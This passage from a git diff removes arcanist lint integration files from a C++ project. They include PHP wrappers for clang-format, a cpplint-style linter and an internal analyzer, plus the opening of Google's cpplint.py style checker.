new SQLite3( - $this->getProjectRoot().'/_build/_lint/lint.db', - SQLITE3_OPEN_READONLY)) - ->query("SELECT * FROM raised_issues"); - - while ($issue = $result->fetchArray(SQLITE3_ASSOC)) { - // Skip issues not part of the linted file. - if (in_array($issue['file'], $interesting_paths)) { - $this->addLintMessage(id(new ArcanistLintMessage()) - ->setPath($issue['file']) - ->setLine($issue['line']) - ->setChar($issue['column']) - ->setCode('Howtoeven') - ->setSeverity($this->getSeverity($issue['severity'])) - ->setName('Hte-'.$issue['name']) - ->setDescription( - sprintf( - "%s\n\n%s", - ($issue['message']) ? $issue['message'] : $issue['description'], - $issue['explanation'])) - ->setOriginalText(idx($issue, 'original', '')) - ->setReplacementText(idx($issue, 'replacement', ''))); - } - } - } - - public function lintPath($path) { - } - - /** - * Get the paths that we know how to lint. - * - * The strategy is to first look whether there's an existing compilation - * database and use that if it's exhaustive. We generate our own only if - * necessary. - */ - private function getLintablePaths($paths) { - // Replace headers with existing sources. - for ($i = 0; $i < count($paths); $i++) { - if (preg_match("/\.h$/", $paths[$i])) { - $header = preg_replace("/\.h$/", ".cpp", $paths[$i]); - if (file_exists($header)) { - $paths[$i] = $header; - } - } - } - - // Check if database exists and is exhaustive. - $available_paths = $this->getAvailablePaths(); - $lintable_paths = array_intersect($paths, $available_paths); - if ($paths === $lintable_paths) { - return $lintable_paths; - } - - // Generate our own database. - $targets = $this->getTargetsFor($paths); - if (!$targets) { - PhutilConsole::getConsole()->writeErr( - "No build targets found for %s\n", - implode(', ', $paths)); - return array(); - } - - $this->localExecx("./tools/build/bin/fbconfig.par -r %Ls", $targets); - $this->localExecx("./tools/build/bin/fbmake.par gen_cdb"); - - $available_paths = $this->getAvailablePaths(); - $lintable_paths = array_intersect($paths, $available_paths); - if ($paths != $lintable_paths) { - PhutilConsole::getConsole()->writeErr( - "Can't lint %s\n", - implode(', ', array_diff($paths, $available_paths))); - } - - // Return what we know how to lint. - return $lintable_paths; - } - - /** - * Get the available paths in the current compilation database. - */ - private function getAvailablePaths() { - $database_path = $this->getProjectRoot() - .'/_build/dev/compile_commands.json'; - if (!file_exists($database_path)) { - return array(); - } - - $entries = json_decode(file_get_contents($database_path), true); - $paths = array(); - foreach ($entries as $entry) { - $paths[] = $entry['file']; - } - return $paths; - } - - /** - * Search for the targets directories for the given files. - */ - private static function getTargetsFor($paths) { - $targets = array(); - foreach ($paths as $path) { - while (($path = dirname($path)) !== '.') { - if (in_array('TARGETS', scandir($path))) { - $contents = file_get_contents($path.'/TARGETS'); - if (strpos($contents, 'cpp_binary') !== false) { - $targets[] = $path; - break; - } - } - } - } - return array_unique($targets); - } - - /** - * The paths that we actually want to report on. - */ - private function getInterestingPaths($paths) { - $headers = array(); - foreach ($paths as $path) { - $headers[] = preg_replace("/\.cpp$/", ".h", $path); - } - return array_merge($paths, $headers); - } - - /** - * The path where the binary is located. Will return the current dewey binary - * unless the `HOWTOEVEN_BUILD` environment variable is set. - */ - private function getBinaryPath() { - $path = sprintf( - "/mnt/dewey/fbcode/.commits/%s/builds/howtoeven/client", - self::VERSION); - - $build = getenv('HOWTOEVEN_BUILD'); - if ($build) { - $path = sprintf( - "./_build/%s/tools/howtoeven/client", - $build); - if (!file_exists($path)) { - PhutilConsole::getConsole()->writeErr(">> %s does not exist\n", $path); - exit(1); - } - } - - return $path; - } - - /** - * Execute the command in the root directory. - */ - private function localExecx($command /* , ... */) { - $arguments = func_get_args(); - return newv('ExecFuture', $arguments) - ->setCWD($this->getProjectRoot()) - ->resolvex(); - } - - /** - * The root of the project. - */ - private function getProjectRoot() { - return $this->getEngine()->getWorkingCopy()->getProjectRoot(); - } - - private function getFilteredIssues() { - $issues = getenv('HOWTOEVEN_ISSUES'); - return ($issues) ? csprintf('-issues %s', $issues) : ''; - } - -} diff --git a/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php b/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php deleted file mode 100644 index a94a0bed15e..00000000000 --- a/arcanist_util/cpp_linter/FbcodeClangFormatLinter.php +++ /dev/null @@ -1,58 +0,0 @@ - ArcanistLintSeverity::SEVERITY_ADVICE, - ); - } - - public function getLintNameMap() { - return array( - self::LINT_FORMATTING => pht('Changes are not clang-formatted'), - ); - } - - protected function getFormatFuture($path, array $changed) { - $args = ""; - foreach ($changed as $key => $value) { - $args .= " --lines=$key:$key"; - } - - $binary = self::CLANG_FORMAT_BINARY; - if (!file_exists($binary)) { - // trust the $PATH - $binary = "clang-format"; - } - - return new ExecFuture( - "%s %s $args", - $binary, - $this->getEngine()->getFilePathOnDisk($path)); - } - - protected function getLintMessage($diff) { - $link_to_clang_format = - "[[ http://fburl.com/clang-format | clang-format ]]"; - return <<getEngine()->getFilePathOnDisk($p); - $lpath_file = file($lpath); - if (preg_match('/\.(c)$/', $lpath) || - preg_match('/-\*-.*Mode: C[; ].*-\*-/', $lpath_file[0]) || - preg_match('/vim(:.*)*:\s*(set\s+)?filetype=c\s*:/', $lpath_file[0]) - ) { - $futures[$p] = new ExecFuture("%s %s %s 2>&1", - self::FLINT, self::C_FLAG, - $this->getEngine()->getFilePathOnDisk($p)); - } else { - $futures[$p] = new ExecFuture("%s %s 2>&1", - self::FLINT, $this->getEngine()->getFilePathOnDisk($p)); - } - } - - foreach (Futures($futures)->limit(8) as $p => $f) { - $this->rawLintOutput[$p] = $f->resolvex(); - } - - return; - } - - public function getLinterName() { - return "FBCPP"; - } - - public function lintPath($path) { - $this->runCppLint($path); - } - - private function runCppLint($path) { - $msgs = $this->getCppLintOutput($path); - foreach ($msgs as $m) { - $this->raiseLintAtLine($m['line'], 0, $m['severity'], $m['msg']); - } - } - - private function adviseOnEachPattern( - $path, - $regex, - $message, - $lint_type = self::LINT_ADVICE, - $match_idx = 0) { - $file_data = $this->getData($path); - $matches = array(); - if (!preg_match_all($regex, $file_data, $matches, PREG_OFFSET_CAPTURE)) { - return; - } - - foreach ($matches[$match_idx] as $match) { - list($match_str, $offset) = $match; - $this->raiseLintAtOffset($offset, $lint_type, $message, $match_str); - } - } - - public function getLintSeverityMap() { - return array( - self::LINT_WARNING => ArcanistLintSeverity::SEVERITY_WARNING, - self::LINT_ADVICE => ArcanistLintSeverity::SEVERITY_ADVICE, - self::LINT_ERROR => ArcanistLintSeverity::SEVERITY_ERROR - ); - } - - public function getLintNameMap() { - return array( - self::LINT_ADVICE => "CppLint Advice", - self::LINT_WARNING => "CppLint Warning", - self::LINT_ERROR => "CppLint Error" - ); - } - - private function getCppLintOutput($path) { - if (!array_key_exists($path, $this->rawLintOutput)) { - return array(); - } - list($output) = $this->rawLintOutput[$path]; - - $msgs = array(); - $current = null; - $matches = array(); - foreach (explode("\n", $output) as $line) { - if (preg_match('/.*?:(\d+):(.*)/', $line, $matches)) { - if ($current) { - $msgs[] = $current; - } - $line = $matches[1]; - $text = $matches[2]; - if (preg_match('/.*Warning.*/', $text)) { - $sev = self::LINT_WARNING; - } else if (preg_match('/.*Advice.*/', $text)) { - $sev = self::LINT_ADVICE; - } else { - $sev = self::LINT_ERROR; - } - $current = array('line' => $line, - 'msg' => $text, - 'severity' => $sev); - } else if ($current) { - $current['msg'] .= ' ' . $line; - } - } - if ($current) { - $msgs[] = $current; - } - - return $msgs; - } -} diff --git a/arcanist_util/cpp_linter/cpplint.py b/arcanist_util/cpp_linter/cpplint.py deleted file mode 100755 index 3d0c45a6dd0..00000000000 --- a/arcanist_util/cpp_linter/cpplint.py +++ /dev/null @@ -1,4767 +0,0 @@ -#!/usr/bin/python -# Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -# This source code is licensed under the BSD-style license found in the -# LICENSE file in the root directory of this source tree. An additional grant -# of patent rights can be found in the PATENTS file in the same directory. -# Copyright (c) 2011 The LevelDB Authors. All rights reserved. -# Use of this source code is governed by a BSD-style license that can be -# found in the LICENSE file. See the AUTHORS file for names of contributors. -# -# Copyright (c) 2009 Google Inc. All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are -# met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above -# copyright notice, this list of conditions and the following disclaimer -# in the documentation and/or other materials provided with the -# distribution. -# * Neither the name of Google Inc. nor the names of its -# contributors may be used to endorse or promote products derived from -# this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -"""Does google-lint on c++ files. - -The goal of this script is to identify places in the code that *may* -be in non-compliance with google style. It does not attempt to fix -up these problems -- the point is to educate. It does also not -attempt to find all problems, or to ensure that everything it does -find is legitimately a problem. - -In particular, we can get very confused by /* and // inside strings! -We do a small hack, which is to ignore //'s with "'s after them on the -same line, but it is far from perfect (in either direction). -""" - -import codecs -import copy -import getopt -import math # for log -import os -import re -import sre_compile -import string -import sys -import unicodedata - - -_USAGE = """ -Syntax: cpplint.py [--verbose=#] [--output=vs7] [--filter=-x,+y,...] - [--counting=total|toplevel|detailed] [--root=subdir] - [--linelength=digits] - [file] ... - - The style guidelines this tries to follow are those in - http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml - - Every problem is given a confidence score from 1-5, with 5 meaning we are - certain of the problem, and 1 meaning it could be a legitimate construct. - This will miss some errors, and is not a substitute for a code review. - - To suppress false-positive errors of a certain category, add a - 'NOLINT(category)' comment to the line. NOLINT or NOLINT(*) - suppresses errors of all categories on that line. - - The files passed in will be linted; at least one file must be provided. - Default linted extensions are .cc, .cpp, .cu, .cuh and .h. Change the - extensions with the --extensions flag. - - Flags: - - output=vs7 - By default, the output is formatted to ease emacs parsing. Visual Studio - compatible output (vs7) may also be used. Other formats are unsupported. - - verbose=# - Specify a number 0-5 to restrict errors to certain verbosity levels. - - filter=-x,+y,... - Specify a comma-separated list of category-filters to apply: only - error messages whose category names pass the filters will be printed. - (Category names are printed with the message and look like - "[whitespace/indent]".) Filters are evaluated left to right. - "-FOO" and "FOO" means "do not print categories that start with FOO". - "+FOO" means "do print categories that start with FOO". - - Examples: --filter=-whitespace,+whitespace/braces - --filter=whitespace,runtime/printf,+runtime/printf_format - --filter=-,+build/include_what_you_use - - To see a list of all the categories used in cpplint, pass no arg: - --filter= - - counting=total|toplevel|detailed - The total number of errors found is always printed. If - 'toplevel' is provided, then the count of errors in each of - the top-level categories like 'build' and 'whitespace' will - also be printed. If 'detailed' is provided, then a count - is provided for each category like 'build/class'. - - root=subdir - The root directory used for deriving header guard CPP variable. - By default, the header guard CPP variable is calculated as the relative - path to the directory that contains .git, .hg, or .svn. When this flag - is specified, the relative path is calculated from the specified - directory. If the specified directory does not exist, this flag is - ignored. - - Examples: - Assuing that src/.git exists, the header guard CPP variables for - src/chrome/browser/ui/browser.h are: - - No flag => CHROME_BROWSER_UI_BROWSER_H_ - --root=chrome => BROWSER_UI_BROWSER_H_ - --root=chrome/browser => UI_BROWSER_H_ - - linelength=digits - This is the allowed line length for the project. The default value is - 80 characters. - - Examples: - --linelength=120 - - extensions=extension,extension,... - The allowed file extensions that cpplint will check - - Examples: - --extensions=hpp,cpp -""" - -# We categorize each error message we print. Here are the categories. -# We want an explicit list so we can list them all in cpplint --filter=. -# If you add a new error message with a new category, add it to the list -# here! cpplint_unittest.py should tell you if you forget to do this. -_ERROR_CATEGORIES = [ - 'build/class', - 'build/deprecated', - 'build/endif_comment', - 'build/explicit_make_pair', - 'build/forward_decl', - 'build/header_guard', - 'build/include', - 'build/include_alpha', - 'build/include_order', - 'build/include_what_you_use', - 'build/namespaces', - 'build/printf_format', - 'build/storage_class', - 'legal/copyright', - 'readability/alt_tokens', - 'readability/braces', - 'readability/casting', - 'readability/check', - 'readability/constructors', - 'readability/fn_size', - 'readability/function', - 'readability/multiline_comment', - 'readability/multiline_string', - 'readability/namespace', - 'readability/nolint', - 'readability/nul', - 'readability/streams', - 'readability/todo', - 'readability/utf8', - 'runtime/arrays', - 'runtime/casting', - 'runtime/explicit', - 'runtime/int', - 'runtime/init', - 'runtime/invalid_increment', - 'runtime/member_string_references', - 'runtime/memset', - 'runtime/operator', - 'runtime/printf', - 'runtime/printf_format', - 'runtime/references', - 'runtime/string', - 'runtime/threadsafe_fn', - 'runtime/vlog', - 'whitespace/blank_line', - 'whitespace/braces', - 'whitespace/comma', - 'whitespace/comments', - 'whitespace/empty_conditional_body', - 'whitespace/empty_loop_body', - 'whitespace/end_of_line', - 'whitespace/ending_newline', - 'whitespace/forcolon', - 'whitespace/indent', - 'whitespace/line_length', - 'whitespace/newline', - 'whitespace/operators', - 'whitespace/parens', - 'whitespace/semicolon', - 'whitespace/tab', - 'whitespace/todo' - ] - -# The default state of the category filter. This is overrided by the --filter= -# flag. By default all errors are on, so only add here categories that should be -# off by default (i.e., categories that must be enabled by the --filter= flags). -# All entries here should start with a '-' or '+', as in the --filter= flag. -_DEFAULT_FILTERS = [] - -# We used to check for high-bit characters, but after much discussion we -# decided those were OK, as long as they were in UTF-8 and didn't represent -# hard-coded international strings, which belong in a separate i18n file. - - -# C++ headers -_CPP_HEADERS = frozenset([ - # Legacy - 'algobase.h', - 'algo.h', - 'alloc.h', - 'builtinbuf.h', - 'bvector.h', - 'complex.h', - 'defalloc.h', - 'deque.h', - 'editbuf.h', - 'fstream.h', - 'function.h', - 'hash_map', - 'hash_map.h', - 'hash_set', - 'hash_set.h', - 'hashtable.h', - 'heap.h', - 'indstream.h', - 'iomanip.h', - 'iostream.h', - 'istream.h', - 'iterator.h', - 'list.h', - 'map.h', - 'multimap.h', - 'multiset.h', - 'ostream.h', - 'pair.h', - 'parsestream.h', - 'pfstream.h', - 'procbuf.h', - 'pthread_alloc', - 'pthread_alloc.h', - 'rope', - 'rope.h', - 'ropeimpl.h', - 'set.h', - 'slist', - 'slist.h', - 'stack.h', - 'stdiostream.h', - 'stl_alloc.h', - 'stl_relops.h', - 'streambuf.h', - 'stream.h', - 'strfile.h', - 'strstream.h', - 'tempbuf.h', - 'tree.h', - 'type_traits.h', - 'vector.h', - # 17.6.1.2 C++ library headers - 'algorithm', - 'array', - 'atomic', - 'bitset', - 'chrono', - 'codecvt', - 'complex', - 'condition_variable', - 'deque', - 'exception', - 'forward_list', - 'fstream', - 'functional', - 'future', - 'initializer_list', - 'iomanip', - 'ios', - 'iosfwd', - 'iostream', - 'istream', - 'iterator', - 'limits', - 'list', - 'locale', - 'map', - 'memory', - 'mutex', - 'new', - 'numeric', - 'ostream', - 'queue', - 'random', - 'ratio', - 'regex', - 'set', - 'sstream', - 'stack', - 'stdexcept', - 'streambuf', - 'string', - 'strstream', - 'system_error', - 'thread', - 'tuple', - 'typeindex', - 'typeinfo', - 'type_traits', - 'unordered_map', - 'unordered_set', - 'utility', - 'valarray', - 'vector', - # 17.6.1.2 C++ headers for C library facilities - 'cassert', - 'ccomplex', - 'cctype', - 'cerrno', - 'cfenv', - 'cfloat', - 'cinttypes', - 'ciso646', - 'climits', - 'clocale', - 'cmath', - 'csetjmp', - 'csignal', - 'cstdalign', - 'cstdarg', - 'cstdbool', - 'cstddef', - 'cstdint', - 'cstdio', - 'cstdlib', - 'cstring', - 'ctgmath', - 'ctime', - 'cuchar', - 'cwchar', - 'cwctype', - ]) - -# Assertion macros. These are defined in base/logging.h and -# testing/base/gunit.h. Note that the _M versions need to come first -# for substring matching to work. -_CHECK_MACROS = [ - 'DCHECK', 'CHECK', - 'EXPECT_TRUE_M', 'EXPECT_TRUE', - 'ASSERT_TRUE_M', 'ASSERT_TRUE', - 'EXPECT_FALSE_M', 'EXPECT_FALSE', - 'ASSERT_FALSE_M', 'ASSERT_FALSE', - ] - -# Replacement macros for CHECK/DCHECK/EXPECT_TRUE/EXPECT_FALSE -_CHECK_REPLACEMENT = dict([(m, {}) for m in _CHECK_MACROS]) - -for op, replacement in [('==', 'EQ'), ('!=', 'NE'), - ('>=', 'GE'), ('>', 'GT'), - ('<=', 'LE'), ('<', 'LT')]: - _CHECK_REPLACEMENT['DCHECK'][op] = 'DCHECK_%s' % replacement - _CHECK_REPLACEMENT['CHECK'][op] = 'CHECK_%s' % replacement - _CHECK_REPLACEMENT['EXPECT_TRUE'][op] = 'EXPECT_%s' % replacement - _CHECK_REPLACEMENT['ASSERT_TRUE'][op] = 'ASSERT_%s' % replacement - _CHECK_REPLACEMENT['EXPECT_TRUE_M'][op] = 'EXPECT_%s_M' % replacement - _CHECK_REPLACEMENT['ASSERT_TRUE_M'][op] = 'ASSERT_%s_M' % replacement - -for op, inv_replacement in [('==', 'NE'), ('!=', 'EQ'), - ('>=', 'LT'), ('>', 'LE'), - ('<=', 'GT'), ('<', 'GE')]: - _CHECK_REPLACEMENT['EXPECT_FALSE'][op] = 'EXPECT_%s' % inv_replacement - _CHECK_REPLACEMENT['ASSERT_FALSE'][op] = 'ASSERT_%s' % inv_replacement - _CHECK_REPLACEMENT['EXPECT_FALSE_M'][op] = 'EXPECT_%s_M' % inv_replacement - _CHECK_REPLACEMENT['ASSERT_FALSE_M'][op] = 'ASSERT_%s_M' % inv_replacement - -# Alternative tokens and their replacements. For full list, see section 2.5 -# Alternative tokens [lex.digraph] in the C++ standard. -# -# Digraphs (such as '%:') are not included here since it's a mess to -# match those on a word boundary. -_ALT_TOKEN_REPLACEMENT = { - 'and': '&&', - 'bitor': '|', - 'or': '||', - 'xor': '^', - 'compl': '~', - 'bitand': '&', - 'and_eq': '&=', - 'or_eq': '|=', - 'xor_eq': '^=', - 'not': '!', - 'not_eq': '!=' - } - -# Compile regular expression that matches all the above keywords. The "[ =()]" -# bit is meant to avoid matching these keywords outside of boolean expressions. -# -# False positives include C-style multi-line comments and multi-line strings -# but those have always been troublesome for cpplint. -_ALT_TOKEN_REPLACEMENT_PATTERN = re.compile( - r'[ =()](' + ('|'.join(_ALT_TOKEN_REPLACEMENT.keys())) + r')(?=[ (]|$)') - - -# These constants define types of headers for use with -# _IncludeState.CheckNextIncludeOrder(). -_C_SYS_HEADER = 1 -_CPP_SYS_HEADER = 2 -_LIKELY_MY_HEADER = 3 -_POSSIBLE_MY_HEADER = 4 -_OTHER_HEADER = 5 - -# These constants define the current inline assembly state -_NO_ASM = 0 # Outside of inline assembly block -_INSIDE_ASM = 1 # Inside inline assembly block -_END_ASM = 2 # Last line of inline assembly block -_BLOCK_ASM = 3 # The whole block is an inline assembly block - -# Match start of assembly blocks -_MATCH_ASM = re.compile(r'^\s*(?:asm|_asm|__asm|__asm__)' - r'(?:\s+(volatile|__volatile__))?' - r'\s*[{(]') - - -_regexp_compile_cache = {} - -# Finds occurrences of NOLINT or NOLINT(...). -_RE_SUPPRESSION = re.compile(r'\bNOLINT\b(\([^)]*\))?') - -# {str, set(int)}: a map from error categories to sets of linenumbers -# on which those errors are expected and should be suppressed. -_error_suppressions = {} - -# The root directory used for deriving header guard CPP variable. -# This is set by --root flag. -_root = None - -# The allowed line length of files. -# This is set by --linelength flag. -_line_length = 80 - -# The allowed extensions for file names -# This is set by --extensions flag. -_valid_extensions = set(['cc', 'h', 'cpp', 'cu', 'cuh']) - -def ParseNolintSuppressions(filename, raw_line, linenum, error): - """Updates the global list of error-suppressions. - - Parses any NOLINT comments on the current line, updating the global - error_suppressions store. Reports an error if the NOLINT comment - was malformed. - - Args: - filename: str, the name of the input file. - raw_line: str, the line of input text, with comments. - linenum: int, the number of the current line. - error: function, an error handler. - """ - # FIXME(adonovan): "NOLINT(" is misparsed as NOLINT(*). - matched = _RE_SUPPRESSION.search(raw_line) - if matched: - category = matched.group(1) - if category in (None, '(*)'): # => "suppress all" - _error_suppressions.setdefault(None, set()).add(linenum) - else: - if category.startswith('(') and category.endswith(')'): - category = category[1:-1] - if category in _ERROR_CATEGORIES: - _error_suppressions.setdefault(category, set()).add(linenum) - else: - error(filename, linenum, 'readability/nolint', 5, - 'Unknown NOLINT error category: %s' % category) - - -def ResetNolintSuppressions(): - "Resets the set of NOLINT suppressions to empty." - _error_suppressions.clear() - - -def IsErrorSuppressedByNolint(category, linenum): - """Returns true if the specified error category is suppressed on this line. - - Consults the global error_suppressions map populated by - ParseNolintSuppressions/ResetNolintSuppressions. - - Args: - category: str, the category of the error. - linenum: int, the current line number. - Returns: - bool, True iff the error should be suppressed due to a NOLINT comment. - """ - return (linenum in _error_suppressions.get(category, set()) or - linenum in _error_suppressions.get(None, set())) - -def Match(pattern, s): - """Matches the string with the pattern, caching the compiled regexp.""" - # The regexp compilation caching is inlined in both Match and Search for - # performance reasons; factoring it out into a separate function turns out - # to be noticeably expensive. - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].match(s) - - -def ReplaceAll(pattern, rep, s): - """Replaces instances of pattern in a string with a replacement. - - The compiled regex is kept in a cache shared by Match and Search. - - Args: - pattern: regex pattern - rep: replacement text - s: search string - - Returns: - string with replacements made (or original string if no replacements) - """ - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].sub(rep, s) - - -def Search(pattern, s): - """Searches the string for the pattern, caching the compiled regexp.""" - if pattern not in _regexp_compile_cache: - _regexp_compile_cache[pattern] = sre_compile.compile(pattern) - return _regexp_compile_cache[pattern].search(s) - - -class _IncludeState(dict): - """Tracks line numbers for includes, and the order in which includes appear. - - As a dict, an _IncludeState object serves as a mapping between include - filename and line number on which that file was included. - - Call CheckNextIncludeOrder() once for each header in the file, passing - in the type constants defined above. Calls in an illegal order will - raise an _IncludeError with an appropriate error message. - - """ - # self._section will move monotonically through this set. If it ever - # needs to move backwards, CheckNextIncludeOrder will raise an error. - _INITIAL_SECTION = 0 - _MY_H_SECTION = 1 - _C_SECTION = 2 - _CPP_SECTION = 3 - _OTHER_H_SECTION = 4 - - _TYPE_NAMES = { - _C_SYS_HEADER: 'C system header', - _CPP_SYS_HEADER: 'C++ system header', - _LIKELY_MY_HEADER: 'header this file implements', - _POSSIBLE_MY_HEADER: 'header this file may implement', - _OTHER_HEADER: 'other header', - } - _SECTION_NAMES = { - _INITIAL_SECTION: "... nothing. (This can't be an error.)", - _MY_H_SECTION: 'a header this file implements', - _C_SECTION: 'C system header', - _CPP_SECTION: 'C++ system header', - _OTHER_H_SECTION: 'other header', - } - - def __init__(self): - dict.__init__(self) - self.ResetSection() - - def ResetSection(self): - # The name of the current section. - self._section = self._INITIAL_SECTION - # The path of last found header. - self._last_header = '' - - def SetLastHeader(self, header_path): - self._last_header = header_path - - def CanonicalizeAlphabeticalOrder(self, header_path): - """Returns a path canonicalized for alphabetical comparison. - - - replaces "-" with "_" so they both cmp the same. - - removes '-inl' since we don't require them to be after the main header. - - lowercase everything, just in case. - - Args: - header_path: Path to be canonicalized. - - Returns: - Canonicalized path. - """ - return header_path.replace('-inl.h', '.h').replace('-', '_').lower() - - def IsInAlphabeticalOrder(self, clean_lines, linenum, header_path): - """Check if a header is in alphabetical order with the previous header. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - header_path: Canonicalized header to be checked. - - Returns: - Returns true if the header is in alphabetical order. - """ - # If previous section is different from current section, _last_header will - # be reset to empty string, so it's always less than current header. - # - # If previous line was a blank line, assume that the headers are - # intentionally sorted the way they are. - if (self._last_header > header_path and - not Match(r'^\s*$', clean_lines.elided[linenum - 1])): - return False - return True - - def CheckNextIncludeOrder(self, header_type): - """Returns a non-empty error message if the next header is out of order. - - This function also updates the internal state to be ready to check - the next include. - - Args: - header_type: One of the _XXX_HEADER constants defined above. - - Returns: - The empty string if the header is in the right order, or an - error message describing what's wrong. - - """ - error_message = ('Found %s after %s' % - (self._TYPE_NAMES[header_type], - self._SECTION_NAMES[self._section])) - - last_section = self._section - - if header_type == _C_SYS_HEADER: - if self._section <= self._C_SECTION: - self._section = self._C_SECTION - else: - self._last_header = '' - return error_message - elif header_type == _CPP_SYS_HEADER: - if self._section <= self._CPP_SECTION: - self._section = self._CPP_SECTION - else: - self._last_header = '' - return error_message - elif header_type == _LIKELY_MY_HEADER: - if self._section <= self._MY_H_SECTION: - self._section = self._MY_H_SECTION - else: - self._section = self._OTHER_H_SECTION - elif header_type == _POSSIBLE_MY_HEADER: - if self._section <= self._MY_H_SECTION: - self._section = self._MY_H_SECTION - else: - # This will always be the fallback because we're not sure - # enough that the header is associated with this file. - self._section = self._OTHER_H_SECTION - else: - assert header_type == _OTHER_HEADER - self._section = self._OTHER_H_SECTION - - if last_section != self._section: - self._last_header = '' - - return '' - - -class _CppLintState(object): - """Maintains module-wide state..""" - - def __init__(self): - self.verbose_level = 1 # global setting. - self.error_count = 0 # global count of reported errors - # filters to apply when emitting error messages - self.filters = _DEFAULT_FILTERS[:] - self.counting = 'total' # In what way are we counting errors? - self.errors_by_category = {} # string to int dict storing error counts - - # output format: - # "emacs" - format that emacs can parse (default) - # "vs7" - format that Microsoft Visual Studio 7 can parse - self.output_format = 'emacs' - - def SetOutputFormat(self, output_format): - """Sets the output format for errors.""" - self.output_format = output_format - - def SetVerboseLevel(self, level): - """Sets the module's verbosity, and returns the previous setting.""" - last_verbose_level = self.verbose_level - self.verbose_level = level - return last_verbose_level - - def SetCountingStyle(self, counting_style): - """Sets the module's counting options.""" - self.counting = counting_style - - def SetFilters(self, filters): - """Sets the error-message filters. - - These filters are applied when deciding whether to emit a given - error message. - - Args: - filters: A string of comma-separated filters (eg "+whitespace/indent"). - Each filter should start with + or -; else we die. - - Raises: - ValueError: The comma-separated filters did not all start with '+' or '-'. - E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter" - """ - # Default filters always have less priority than the flag ones. - self.filters = _DEFAULT_FILTERS[:] - for filt in filters.split(','): - clean_filt = filt.strip() - if clean_filt: - self.filters.append(clean_filt) - for filt in self.filters: - if not (filt.startswith('+') or filt.startswith('-')): - raise ValueError('Every filter in --filters must start with + or -' - ' (%s does not)' % filt) - - def ResetErrorCounts(self): - """Sets the module's error statistic back to zero.""" - self.error_count = 0 - self.errors_by_category = {} - - def IncrementErrorCount(self, category): - """Bumps the module's error statistic.""" - self.error_count += 1 - if self.counting in ('toplevel', 'detailed'): - if self.counting != 'detailed': - category = category.split('/')[0] - if category not in self.errors_by_category: - self.errors_by_category[category] = 0 - self.errors_by_category[category] += 1 - - def PrintErrorCounts(self): - """Print a summary of errors by category, and the total.""" - for category, count in self.errors_by_category.iteritems(): - sys.stderr.write('Category \'%s\' errors found: %d\n' % - (category, count)) - sys.stderr.write('Total errors found: %d\n' % self.error_count) - -_cpplint_state = _CppLintState() - - -def _OutputFormat(): - """Gets the module's output format.""" - return _cpplint_state.output_format - - -def _SetOutputFormat(output_format): - """Sets the module's output format.""" - _cpplint_state.SetOutputFormat(output_format) - - -def _VerboseLevel(): - """Returns the module's verbosity setting.""" - return _cpplint_state.verbose_level - - -def _SetVerboseLevel(level): - """Sets the module's verbosity, and returns the previous setting.""" - return _cpplint_state.SetVerboseLevel(level) - - -def _SetCountingStyle(level): - """Sets the module's counting options.""" - _cpplint_state.SetCountingStyle(level) - - -def _Filters(): - """Returns the module's list of output filters, as a list.""" - return _cpplint_state.filters - - -def _SetFilters(filters): - """Sets the module's error-message filters. - - These filters are applied when deciding whether to emit a given - error message. - - Args: - filters: A string of comma-separated filters (eg "whitespace/indent"). - Each filter should start with + or -; else we die. - """ - _cpplint_state.SetFilters(filters) - - -class _FunctionState(object): - """Tracks current function name and the number of lines in its body.""" - - _NORMAL_TRIGGER = 250 # for --v=0, 500 for --v=1, etc. - _TEST_TRIGGER = 400 # about 50% more than _NORMAL_TRIGGER. - - def __init__(self): - self.in_a_function = False - self.lines_in_function = 0 - self.current_function = '' - - def Begin(self, function_name): - """Start analyzing function body. - - Args: - function_name: The name of the function being tracked. - """ - self.in_a_function = True - self.lines_in_function = 0 - self.current_function = function_name - - def Count(self): - """Count line in current function body.""" - if self.in_a_function: - self.lines_in_function += 1 - - def Check(self, error, filename, linenum): - """Report if too many lines in function body. - - Args: - error: The function to call with any errors found. - filename: The name of the current file. - linenum: The number of the line to check. - """ - if Match(r'T(EST|est)', self.current_function): - base_trigger = self._TEST_TRIGGER - else: - base_trigger = self._NORMAL_TRIGGER - trigger = base_trigger * 2**_VerboseLevel() - - if self.lines_in_function > trigger: - error_level = int(math.log(self.lines_in_function / base_trigger, 2)) - # 50 => 0, 100 => 1, 200 => 2, 400 => 3, 800 => 4, 1600 => 5, ... - if error_level > 5: - error_level = 5 - error(filename, linenum, 'readability/fn_size', error_level, - 'Small and focused functions are preferred:' - ' %s has %d non-comment lines' - ' (error triggered by exceeding %d lines).' % ( - self.current_function, self.lines_in_function, trigger)) - - def End(self): - """Stop analyzing function body.""" - self.in_a_function = False - - -class _IncludeError(Exception): - """Indicates a problem with the include order in a file.""" - pass - - -class FileInfo: - """Provides utility functions for 